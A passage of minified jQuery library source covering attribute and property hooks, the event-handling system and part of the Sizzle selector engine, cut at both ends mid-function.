n=v.valHooks[s.type]||v.valHooks[s.nodeName.toLowerCase()],n&&"get"in n&&(r=n.get(s,"value"))!==t?r:(r=s.value,typeof r=="string"?r.replace(R,""):r==null?"":r);return}return i=v.isFunction(e),this.each(function(r){var s,o=v(this);if(this.nodeType!==1)return;i?s=e.call(this,r,o.val()):s=e,s==null?s="":typeof s=="number"?s+="":v.isArray(s)&&(s=v.map(s,function(e){return e==null?"":e+""})),n=v.valHooks[this.type]||v.valHooks[this.nodeName.toLowerCase()];if(!n||!("set"in n)||n.set(this,s,"value")===t)this.value=s})}}),v.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,s=e.type==="select-one"||i<0,o=s?null:[],u=s?i+1:r.length,a=i<0?u:s?i:0;for(;a<u;a++){n=r[a];if((n.selected||a===i)&&(v.support.optDisabled?!n.disabled:n.getAttribute("disabled")===null)&&(!n.parentNode.disabled||!v.nodeName(n.parentNode,"optgroup"))){t=v(n).val();if(s)return t;o.push(t)}}return o},set:function(e,t){var n=v.makeArray(t);return v(e).find("option").each(function(){this.selected=v.inArray(v(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attrFn:{},attr:function(e,n,r,i){var s,o,u,a=e.nodeType;if(!e||a===3||a===8||a===2)return;if(i&&v.isFunction(v.fn[n]))return v(e)[n](r);if(typeof e.getAttribute=="undefined")return v.prop(e,n,r);u=a!==1||!v.isXMLDoc(e),u&&(n=n.toLowerCase(),o=v.attrHooks[n]||(X.test(n)?F:j));if(r!==t){if(r===null){v.removeAttr(e,n);return}return o&&"set"in o&&u&&(s=o.set(e,r,n))!==t?s:(e.setAttribute(n,r+""),r)}return o&&"get"in o&&u&&(s=o.get(e,n))!==null?s:(s=e.getAttribute(n),s===null?t:s)},removeAttr:function(e,t){var n,r,i,s,o=0;if(t&&e.nodeType===1){r=t.split(y);for(;o<r.length;o++)i=r[o],i&&(n=v.propFix[i]||i,s=X.test(i),s||v.attr(e,i,""),e.removeAttribute(V?i:n),s&&n in e&&(e[n]=!1))}},attrHooks:{type:{set:function(e,t){if(U.test(e.nodeName)&&e.parentNode)v.error("type property can't be changed");else if(!v.support.radioValue&&t==="radio"&&v.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}},value:{get:function(e,t){return j&&v.nodeName(e,"button")?j.get(e,t):t in e?e.value:null},set:function(e,t,n){if(j&&v.nodeName(e,"button"))return j.set(e,t,n);e.value=t}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,s,o,u=e.nodeType;if(!e||u===3||u===8||u===2)return;return o=u!==1||!v.isXMLDoc(e),o&&(n=v.propFix[n]||n,s=v.propHooks[n]),r!==t?s&&"set"in s&&(i=s.set(e,r,n))!==t?i:e[n]=r:s&&"get"in s&&(i=s.get(e,n))!==null?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):z.test(e.nodeName)||W.test(e.nodeName)&&e.href?0:t}}}}),F={get:function(e,n){var r,i=v.prop(e,n);return i===!0||typeof i!="boolean"&&(r=e.getAttributeNode(n))&&r.nodeValue!==!1?n.toLowerCase():t},set:function(e,t,n){var r;return t===!1?v.removeAttr(e,n):(r=v.propFix[n]||n,r in e&&(e[r]=!0),e.setAttribute(n,n.toLowerCase())),n}},V||(I={name:!0,id:!0,coords:!0},j=v.valHooks.button={get:function(e,n){var r;return r=e.getAttributeNode(n),r&&(I[n]?r.value!=="":r.specified)?r.value:t},set:function(e,t,n){var r=e.getAttributeNode(n);return r||(r=i.createAttribute(n),e.setAttributeNode(r)),r.value=t+""}},v.each(["width","height"],function(e,t){v.attrHooks[t]=v.extend(v.attrHooks[t],{set:function(e,n){if(n==="")return e.setAttribute(t,"auto"),n}})}),v.attrHooks.contenteditable={get:j.get,set:function(e,t,n){t===""&&(t="false"),j.set(e,t,n)}}),v.support.hrefNormalized||v.each(["href","src","width","height"],function(e,n){v.attrHooks[n]=v.extend(v.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return r===null?t:r}})}),v.support.style||(v.attrHooks.style={get:function(e){return e.style.cssText.toLowerCase()||t},set:function(e,t){return e.style.cssText=t+""}}),v.support.optSelected||(v.propHooks.selected=v.extend(v.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),v.support.enctype||(v.propFix.enctype="encoding"),v.support.checkOn||v.each(["radio","checkbox"],function(){v.valHooks[this]={get:function(e){return e.getAttribute("value")===null?"on":e.value}}}),v.each(["radio","checkbox"],function(){v.valHooks[this]=v.extend(v.valHooks[this],{set:function(e,t){if(v.isArray(t))return e.checked=v.inArray(v(e).val(),t)>=0}})});var $=/^(?:textarea|input|select)$/i,J=/^([^\.]*|)(?:\.(.+)|)$/,K=/(?:^|\s)hover(\.\S+|)\b/,Q=/^key/,G=/^(?:mouse|contextmenu)|click/,Y=/^(?:focusinfocus|focusoutblur)$/,Z=function(e){return v.event.special.hover?e:e.replace(K,"mouseenter$1 mouseleave$1")};v.event={add:function(e,n,r,i,s){var o,u,a,f,l,c,h,p,d,m,g;if(e.nodeType===3||e.nodeType===8||!n||!r||!(o=v._data(e)))return;r.handler&&(d=r,r=d.handler,s=d.selector),r.guid||(r.guid=v.guid++),a=o.events,a||(o.events=a={}),u=o.handle,u||(o.handle=u=function(e){return typeof v=="undefined"||!!e&&v.event.triggered===e.type?t:v.event.dispatch.apply(u.elem,arguments)},u.elem=e),n=v.trim(Z(n)).split(" ");for(f=0;f<n.length;f++){l=J.exec(n[f])||[],c=l[1],h=(l[2]||"").split(".").sort(),g=v.event.special[c]||{},c=(s?g.delegateType:g.bindType)||c,g=v.event.special[c]||{},p=v.extend({type:c,origType:l[1],data:i,handler:r,guid:r.guid,selector:s,needsContext:s&&v.expr.match.needsContext.test(s),namespace:h.join(".")},d),m=a[c];if(!m){m=a[c]=[],m.delegateCount=0;if(!g.setup||g.setup.call(e,i,h,u)===!1)e.addEventListener?e.addEventListener(c,u,!1):e.attachEvent&&e.attachEvent("on"+c,u)}g.add&&(g.add.call(e,p),p.handler.guid||(p.handler.guid=r.guid)),s?m.splice(m.delegateCount++,0,p):m.push(p),v.event.global[c]=!0}e=null},global:{},remove:function(e,t,n,r,i){var s,o,u,a,f,l,c,h,p,d,m,g=v.hasData(e)&&v._data(e);if(!g||!(h=g.events))return;t=v.trim(Z(t||"")).split(" ");for(s=0;s<t.length;s++){o=J.exec(t[s])||[],u=a=o[1],f=o[2];if(!u){for(u in h)v.event.remove(e,u+t[s],n,r,!0);continue}p=v.event.special[u]||{},u=(r?p.delegateType:p.bindType)||u,d=h[u]||[],l=d.length,f=f?new RegExp("(^|\\.)"+f.split(".").sort().join("\\.(?:.*\\.|)")+"(\\.|$)"):null;for(c=0;c<d.length;c++)m=d[c],(i||a===m.origType)&&(!n||n.guid===m.guid)&&(!f||f.test(m.namespace))&&(!r||r===m.selector||r==="**"&&m.selector)&&(d.splice(c--,1),m.selector&&d.delegateCount--,p.remove&&p.remove.call(e,m));d.length===0&&l!==d.length&&((!p.teardown||p.teardown.call(e,f,g.handle)===!1)&&v.removeEvent(e,u,g.handle),delete h[u])}v.isEmptyObject(h)&&(delete g.handle,v.removeData(e,"events",!0))},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(n,r,s,o){if(!s||s.nodeType!==3&&s.nodeType!==8){var u,a,f,l,c,h,p,d,m,g,y=n.type||n,b=[];if(Y.test(y+v.event.triggered))return;y.indexOf("!")>=0&&(y=y.slice(0,-1),a=!0),y.indexOf(".")>=0&&(b=y.split("."),y=b.shift(),b.sort());if((!s||v.event.customEvent[y])&&!v.event.global[y])return;n=typeof n=="object"?n[v.expando]?n:new v.Event(y,n):new v.Event(y),n.type=y,n.isTrigger=!0,n.exclusive=a,n.namespace=b.join("."),n.namespace_re=n.namespace?new RegExp("(^|\\.)"+b.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,h=y.indexOf(":")<0?"on"+y:"";if(!s){u=v.cache;for(f in u)u[f].events&&u[f].events[y]&&v.event.trigger(n,r,u[f].handle.elem,!0);return}n.result=t,n.target||(n.target=s),r=r!=null?v.makeArray(r):[],r.unshift(n),p=v.event.special[y]||{};if(p.trigger&&p.trigger.apply(s,r)===!1)return;m=[[s,p.bindType||y]];if(!o&&!p.noBubble&&!v.isWindow(s)){g=p.delegateType||y,l=Y.test(g+y)?s:s.parentNode;for(c=s;l;l=l.parentNode)m.push([l,g]),c=l;c===(s.ownerDocument||i)&&m.push([c.defaultView||c.parentWindow||e,g])}for(f=0;f<m.length&&!n.isPropagationStopped();f++)l=m[f][0],n.type=m[f][1],d=(v._data(l,"events")||{})[n.type]&&v._data(l,"handle"),d&&d.apply(l,r),d=h&&l[h],d&&v.acceptData(l)&&d.apply&&d.apply(l,r)===!1&&n.preventDefault();return n.type=y,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(s.ownerDocument,r)===!1)&&(y!=="click"||!v.nodeName(s,"a"))&&v.acceptData(s)&&h&&s[y]&&(y!=="focus"&&y!=="blur"||n.target.offsetWidth!==0)&&!v.isWindow(s)&&(c=s[h],c&&(s[h]=null),v.event.triggered=y,s[y](),v.event.triggered=t,c&&(s[h]=c)),n.result}return},dispatch:function(n){n=v.event.fix(n||e.event);var r,i,s,o,u,a,f,c,h,p,d=(v._data(this,"events")||{})[n.type]||[],m=d.delegateCount,g=l.call(arguments),y=!n.exclusive&&!n.namespace,b=v.event.special[n.type]||{},w=[];g[0]=n,n.delegateTarget=this;if(b.preDispatch&&b.preDispatch.call(this,n)===!1)return;if(m&&(!n.button||n.type!=="click"))for(s=n.target;s!=this;s=s.parentNode||this)if(s.disabled!==!0||n.type!=="click"){u={},f=[];for(r=0;r<m;r++)c=d[r],h=c.selector,u[h]===t&&(u[h]=c.needsContext?v(h,this).index(s)>=0:v.find(h,this,null,[s]).length),u[h]&&f.push(c);f.length&&w.push({elem:s,matches:f})}d.length>m&&w.push({elem:this,matches:d.slice(m)});for(r=0;r<w.length&&!n.isPropagationStopped();r++){a=w[r],n.currentTarget=a.elem;for(i=0;i<a.matches.length&&!n.isImmediatePropagationStopped();i++){c=a.matches[i];if(y||!n.namespace&&!c.namespace||n.namespace_re&&n.namespace_re.test(c.namespace))n.data=c.data,n.handleObj=c,o=((v.event.special[c.origType]||{}).handle||c.handler).apply(a.elem,g),o!==t&&(n.result=o,o===!1&&(n.preventDefault(),n.stopPropagation()))}}return b.postDispatch&&b.postDispatch.call(this,n),n.result},props:"attrChange attrName relatedNode srcElement altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return e.which==null&&(e.which=t.charCode!=null?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,s,o,u=n.button,a=n.fromElement;return e.pageX==null&&n.clientX!=null&&(r=e.target.ownerDocument||i,s=r.documentElement,o=r.body,e.pageX=n.clientX+(s&&s.scrollLeft||o&&o.scrollLeft||0)-(s&&s.clientLeft||o&&o.clientLeft||0),e.pageY=n.clientY+(s&&s.scrollTop||o&&o.scrollTop||0)-(s&&s.clientTop||o&&o.clientTop||0)),!e.relatedTarget&&a&&(e.relatedTarget=a===e.target?n.toElement:a),!e.which&&u!==t&&(e.which=u&1?1:u&2?3:u&4?2:0),e}},fix:function(e){if(e[v.expando])return e;var t,n,r=e,s=v.event.fixHooks[e.type]||{},o=s.props?this.props.concat(s.props):this.props;e=v.Event(r);for(t=o.length;t;)n=o[--t],e[n]=r[n];return e.target||(e.target=r.srcElement||i),e.target.nodeType===3&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,r):e},special:{load:{noBubble:!0},focus:{delegateType:"focusin"},blur:{delegateType:"focusout"},beforeunload:{setup:function(e,t,n){v.isWindow(this)&&(this.onbeforeunload=n)},teardown:function(e,t){this.onbeforeunload===t&&(this.onbeforeunload=null)}}},simulate:function(e,t,n,r){var i=v.extend(new v.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?v.event.trigger(i,null,t):v.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},v.event.handle=v.event.dispatch,v.removeEvent=i.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]=="undefined"&&(e[r]=null),e.detachEvent(r,n))},v.Event=function(e,t){if(!(this instanceof v.Event))return new v.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?tt:et):this.type=e,t&&v.extend(this,t),this.timeStamp=e&&e.timeStamp||v.now(),this[v.expando]=!0},v.Event.prototype={preventDefault:function(){this.isDefaultPrevented=tt;var e=this.originalEvent;if(!e)return;e.preventDefault?e.preventDefault():e.returnValue=!1},stopPropagation:function(){this.isPropagationStopped=tt;var e=this.originalEvent;if(!e)return;e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=tt,this.stopPropagation()},isDefaultPrevented:et,isPropagationStopped:et,isImmediatePropagationStopped:et},v.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){v.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,s=e.handleObj,o=s.selector;if(!i||i!==r&&!v.contains(r,i))e.type=s.origType,n=s.handler.apply(this,arguments),e.type=t;return n}}}),v.support.submitBubbles||(v.event.special.submit={setup:function(){if(v.nodeName(this,"form"))return!1;v.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=v.nodeName(n,"input")||v.nodeName(n,"button")?n.form:t;r&&!v._data(r,"_submit_attached")&&(v.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),v._data(r,"_submit_attached",!0))})},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&v.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){if(v.nodeName(this,"form"))return!1;v.event.remove(this,"._submit")}}),v.support.changeBubbles||(v.event.special.change={setup:function(){if($.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")v.event.add(this,"propertychange._change",function(e){e.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),v.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),v.event.simulate("change",this,e,!0)});return!1}v.event.add(this,"beforeactivate._change",function(e){var t=e.target;$.test(t.nodeName)&&!v._data(t,"_change_attached")&&(v.event.add(t,"change._change",function(e){this.parentNode&&!e.isSimulated&&!e.isTrigger&&v.event.simulate("change",this.parentNode,e,!0)}),v._data(t,"_change_attached",!0))})},handle:function(e){var t=e.target;if(this!==t||e.isSimulated||e.isTrigger||t.type!=="radio"&&t.type!=="checkbox")return e.handleObj.handler.apply(this,arguments)},teardown:function(){return v.event.remove(this,"._change"),!$.test(this.nodeName)}}),v.support.focusinBubbles||v.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){v.event.simulate(t,e.target,v.event.fix(e),!0)};v.event.special[t]={setup:function(){n++===0&&i.addEventListener(e,r,!0)},teardown:function(){--n===0&&i.removeEventListener(e,r,!0)}}}),v.fn.extend({on:function(e,n,r,i,s){var o,u;if(typeof e=="object"){typeof n!="string"&&(r=r||n,n=t);for(u in e)this.on(u,n,r,e[u],s);return this}r==null&&i==null?(i=n,r=n=t):i==null&&(typeof n=="string"?(i=r,r=t):(i=r,r=n,n=t));if(i===!1)i=et;else if(!i)return this;return s===1&&(o=i,i=function(e){return v().off(e),o.apply(this,arguments)},i.guid=o.guid||(o.guid=v.guid++)),this.each(function(){v.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,s;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,v(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if(typeof e=="object"){for(s in e)this.off(s,n,e[s]);return this}if(n===!1||typeof n=="function")r=n,n=t;return r===!1&&(r=et),this.each(function(){v.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},live:function(e,t,n){return v(this.context).on(e,this.selector,t,n),this},die:function(e,t){return v(this.context).off(e,this.selector||"**",t),this},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return arguments.length===1?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){v.event.trigger(e,t,this)})},triggerHandler:function(e,t){if(this[0])return v.event.trigger(e,t,this[0],!0)},toggle:function(e){var t=arguments,n=e.guid||v.guid++,r=0,i=function(n){var i=(v._data(this,"lastToggle"+e.guid)||0)%r;return v._data(this,"lastToggle"+e.guid,i+1),n.preventDefault(),t[i].apply(this,arguments)||!1};i.guid=n;while(r<t.length)t[r++].guid=n;return this.click(i)},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),v.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){v.fn[t]=function(e,n){return n==null&&(n=e,e=null),arguments.length>0?this.on(t,null,e,n):this.trigger(t)},Q.test(t)&&(v.event.fixHooks[t]=v.event.keyHooks),G.test(t)&&(v.event.fixHooks[t]=v.event.mouseHooks)}),function(e,t){function nt(e,t,n,r){n=n||[],t=t||g;var i,s,a,f,l=t.nodeType;if(!e||typeof e!="string")return n;if(l!==1&&l!==9)return[];a=o(t);if(!a&&!r)if(i=R.exec(e))if(f=i[1]){if(l===9){s=t.getElementById(f);if(!s||!s.parentNode)return n;if(s.id===f)return n.push(s),n}else if(t.ownerDocument&&(s=t.ownerDocument.getElementById(f))&&u(t,s)&&s.id===f)return n.push(s),n}else{if(i[2])return S.apply(n,x.call(t.getElementsByTagName(e),0)),n;if((f=i[3])&&Z&&t.getElementsByClassName)return S.apply(n,x.call(t.getElementsByClassName(f),0)),n}return vt(e.replace(j,"$1"),t,n,r,a)}function rt(e){return function(t){var n=t.nodeName.toLowerCase();return n==="input"&&t.type===e}}function it(e){return function(t){var n=t.nodeName.toLowerCase();return(n==="input"||n==="button")&&t.type===e}}function st(e){return N(function(t){return t=+t,N(function(n,r){var i,s=e([],n.length,t),o=s.length;while(o--)n[i=s[o]]&&(n[i]=!(r[i]=n[i]))})})}function ot(e,t,n){if(e===t)return n;var r=e.nextSibling;while(r){if(r===t)return-1;r=r.nextSibling}return 1}function ut(e,t){var n,r,s,o,u,a,f,l=L[d][e+" "];if(l)return t?0:l.slice(0);u=e,a=[],f=i.preFilter;while(u){if(!n||(r=F.exec(u)))r&&(u=u.slice(r[0].length)||u),a.push(s=[]);n=!1;if(r=I.exec(u))s.push(n=new m(r.shift())),u=u.slice(n.length),n.type=r[0].replace(j," ");for(o in i.filter)(r=J[o].exec(u))&&(!f[o]||(r=f[o](r)))&&(s.push(n=new m(r.shift())),u=u.slice(n.length),n.type=o,n.matches=r);if(!n)break}return t?u.length:u?nt.error(e):L(e,a).slice(0)}function at(e,t,r){var i=t.dir,s=r&&t.dir==="parentNode",o=w++;return t.first?function(t,n,r){while(t=t[i])if(s||t.nodeType===1)return e(t,n,r)}:function(t,r,u){if(!u){var a,f=b+" "+o+" ",l=f+n;while(t=t[i])if(s||t.nodeType===1){if((a=t[d])===l)return t.sizset;if(typeof a=="string"&&a.indexOf(f)===0){if(t.sizset)return t}else{t[d]=l;if(e(t,r,u))return t.sizset=!0,t;t.sizset=!1}}}else while(t=t[i])if(s||t.nodeType===1)if(e(t,r,u))return t}}function ft(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function lt(e,t,n,r,i){var s,o=[],u=0,a=e.length,f=t!=null;for(;u<a;u++)if(s=e[u])if(!n||n(s,r,i))o.push(s),f&&t.push(u);return o}function ct(e,t,n,r,i,s){return r&&!r[d]&&(r=ct(r)),i&&!i[d]&&(i=ct(i,s)),N(function(s,o,u,a){var f,l,c,h=[],p=[],d=o.length,v=s||dt(t||"*",u.nodeType?[u]:u,[]),m=e&&(s||!t)?lt(v,h,e,u,a):v,g=n?i||(s?e:d||r)?[]:o:m;n&&n(m,g,u,a);if(r){f=lt(g,p),r(f,[],u,a),l=f.length;while(l--)if(c=f[l])g[p[l]]=!(m[p[l]]=c)}if(s){if(i||e){if(i){f=[],l=g.length;while(l--)(c=g[l])&&f.push(m[l]=c);i(null,g=[],f,a)}l=g.length;while(l--)(c=g[l])&&(f=i?T.call(s,c):h[l])>-1&&(s[f]=!(o[f]=c))}}else g=lt(g===o?g.splice(d,g.length):g),i?i(null,o,g,a):S.apply(o,g)})}function ht(e){var t,n,r,s=e.length,o=i.relative[e[0].type],u=o||i.relative[" "],a=o?1:0,f=at(function(e){return e===t},u,!0),l=at(function(e){return T.call(t,e)>-1},u,!0),h=[function(e,n,r){return!o&&(r||n!==c)||((t=n).nodeType?f(e,n,r):l(e,n,r))}];for(;a<s;a++)if(n=i.relative[e[a].type])h=[at(ft(h),n)];else{n=i.filter[e[a].type].apply(null,e[a].matches);if(n[d]){r=++a;for(;r<s;r++)if(i.relative[e[r].type])break;return ct(a>1&&ft(h),a>1&&e.slice(0,a-1).join("").replace(j,"$1"),n,a<r&&ht(e.slice(a,r)),r<s&&ht(e=e.slice(r)),r<s&&e.join(""))}h.push(n)}return ft(h)}function pt(e,t){var r=t.length>0,s=e.length>0,o=function(u,a,f,l,h){var p,d,v,m=[],y=0,w="0",x=u&&[],T=h!=null,N=c,C=u||s&&i.find.TAG("*",h&&a.parentNode||a),k=b+=N==null?1:Math.E;T&&(c=a!==g&&a,n=o.el);for(;(p=C[w])!=null;w++){if(s&&p){for(d=0;v=e[d];d++)if(v(p,a,f)){l.push(p);break}T&&(b=k,n=++o.el)}r&&((p=!v&&p)&&y--,u&&x.push(p))}y+=w;if(r&&w!==y){for(d=0;v=t[d];d++)v(x,m,a,f);if(u){if(y>0)while(w--)!x[w]&&!m[w]&&(m[w]=E.call(l));m=lt(m)}S.apply(l,m),T&&!u&&m.length>0&&y+t.length>1&&nt.uniqueSort(l)}return T&&(b=k,c=N),x};return o.el=0,r?N(o):o}function dt(e,t,n){var r=0,i=t.length;for(;r<i;r++)nt(e,t[r],n);return n}function vt(e,t,n,r,s){var o,u,f,l,c,h=ut(e),p=h.length;if(!r&&h.length===1){u=h[0]=h[0].slice(0);if(u.length>2&&(f=u[0]).type==="ID"&&t.nodeType===9&&!s&&i.relative[u[1].type]){t=i.find.ID(f.matches[0].replace($,""),t,s)[0];if(!t)return n;e=e.slice(u.shift().length)}for(o=J.POS.test(e)?-1:u.length-1;o>=0;o--){f=u[o];if(i.relative[l=f.type])break;if(c=i.find[l])if(r=c(f.matches[0].replace($,""),z.test(u[0].type)&&t.parentNode||t,s)){u.splice(o,1),e=r.length&&u.join("");if(!e)return S.apply(n,x.call(r,0)),n;break}}}return a(e,h)(r,t,s,n,z.test(e)),n}function mt(){}var n,r,i,s,o,u,a,f,l,c,h=!0,p="undefined",d=("sizcache"+Math.random()).replace(".",""),m=String,g=e.document,y=g.documentElement,b=0,w=0,E=[].pop,S=[].push,x=[].slice,T=[].indexOf||function(e){var t=0,n=this.length;for(;t<n;t++)if(this[t]===e)return t;return-1},N=function(e,t){return e[d]=t==null||t,e},C=function(){var e={},t=[];return N(function(n,r){return t.push(n)>i.cacheLength&&delete e[t.shift()],e[n+" "]=r},e)},k=C(),L=C(),A=C(),O="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[-\\w]|[^\\x00-\\xa0])+",_=M.replace("w","w#"),D="([*^$|!~]?=)",P="\\["+O+"*("+M+")"+O+"*(?:"+D+O+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+_+")|)|)"+O+"*\\]",H=":("+M+")(?:\\((?:(['\"])((?:\\\\.|[^\\\\])*?)\\2|([^()[\\]]*|(?:(?:"+P+")|[^:]|\\\\.)*|.*))\\)|)",B=":(even|odd|eq|gt|lt|nth|first|last)(?:\\("+O+"*((?:-\\d)?\\d*)"+O+"*\\)|)(?=[^-]|$)",j=new RegExp("^"+O+"+|((?:^|[^\\\\])(?:\\\\.)*)"+O+"+$","g"),F=new RegExp("^"+O+"*,"+O+"*"),I=new RegExp("^"+O+"*([\\x20\\t\\r\\n\\f>+~])"+O+"*"),q=new RegExp(H),R=/^(?:#([\w\-]+)|(\w+)|\.([\w\-]+))$/,U=/^:not/,z=/[\x20\t\r\n\f]*[+~]/,W=/:not\($/,X=/h\d/i,V=/input|select|textarea|button/i,$=/\\(?!\\)/g,J={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),NAME:new RegExp("^\\[name=['\"]?("+M+")['\"]?\\]"),TAG:new RegExp("^("+M.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+H),POS:new RegExp(B,"i"),CHILD:new RegExp("^:(only|nth|first|last)-child(?:\\("+O+"*(even|odd|(([+-]|)(\\d*)n|)"+O+"*(?:([+-]|)"+O+"*(\\d+)|))"+O+"*\\)|)","i"),needsContext:new RegExp("^"+O+"*[>+~]|"+B,"i")},K=function(e){var t=g.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}},Q=K(function(e){return e.appendChild(g.createComment("")),!e.getElementsByTagName("*").length}),G=K(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==p&&e.firstChild.getAttribute("href")==="#"}),Y=K(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return t!=="boolean"&&t!=="string"}),Z=K(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",!e.getElementsByClassName||!e.getElementsByClassName("e").length?!1:(e.lastChild.className="e",e.getElementsByClassName("e").length===2)}),et=K(function(e){e.id=d+0,e.innerHTML="<a name='"+d+"'></a><div name='"+d+"'></div>",y.insertBefore(e,y.firstChild);var t=g.getElementsByName&&g.getElementsByName(d).length===2+g.getElementsByName(d+0).length;return r=!g.getElementById(d),y.removeChild(e),t});try{x.call(y.childNodes,0)[0].nodeType}catch(tt){x=function(e){var t,n=[];for(;t=this[e];e++)n.push(t);return n}}nt.matches=function(e,t){return nt(e,null,null,t)},nt.matchesSelector=function(e,t){return nt(t,null,null,[e]).length>0},s=nt.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(i===1||i===9||i===11){if(typeof e.textContent=="string")return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=s(e)}else if(i===3||i===4)return e.nodeValue}else for(;t=e[r];r++)n+=s(t);return n},o=nt.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?t.nodeName!=="HTML":!1},u=nt.contains=y.contains?function(e,t){var n=e.nodeType===9?e.documentElement:e,r=t&&t.parentNode;return e===r||!!(r&&r.nodeType===1&&n.contains&&n.contains(r))}:y.compareDocumentPosition?function(e,t){return t&&!!(e.compareDocumentPosition(t)&16)}:function(e,t){while(t=t.parentNode)if(t===e)return!0;return!1},nt.attr=function(e,t){var n,r=o(e);return r||(t=t.toLowerCase()),(n=i.attrHandle[t])?n(e):r||Y?e.getAttribute(t):(n=e.getAttributeNode(t),n?typeof e[t]=="boolean"?e[t]?t:null:n.specified?n.value:null:null)},i=nt.selectors={cacheLength:50,createPseudo:N,match:J,attrHandle:G?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return e.getAttribute("type")}},find:{ID:r?function(e,t,n){if(typeof t.getElementById!==p&&!n){var r=t.getElementById(e);return r&&r.parentNode?[r]:[]}}:function(e,n,r){if(typeof n.getElementById!==p&&!r){var i=n.getElementById(e);return i?i.id===e||typeof i.getAttributeNode!==p&&i.getAttributeNode("id").value===e?[i]:t:[]}},TAG:Q?function(e,t){if(typeof t.getElementsByTagName!==p)return t.getElementsByTagName(e)}:function(e,t){var n=t.getElementsByTagName(e);if(e==="*"){var r,i=[],s=0;for(;r=n[s];s++)r.nodeType===1&&i.push(r);return i}return n},NAME:et&&function(e,t){if(typeof t.getElementsByName!==p)return t.getElementsByName(name)},CLASS:Z&&function(e,t,n){if(typeof t.getElementsByClassName!==p&&!n)return t.getElementsByClassName(e)}},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace($,""),e[3]=(e[4]||e[5]||"").replace($,""),e[2]==="~="&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),e[1]==="nth"?(e[2]||nt.error(e[0]),e[3]=+(e[3]?e[4]+(e[5]||1):2*(e[2]==="even"||e[2]==="odd")),e[4]=+(e[6]+e[7]||e[2]==="odd")):e[2]&&nt.error(e[0]),e},PSEUDO:function(e){var t,n;if(J.CHILD.test(e[0]))return null;if(e[3])e[2]=e[3];else 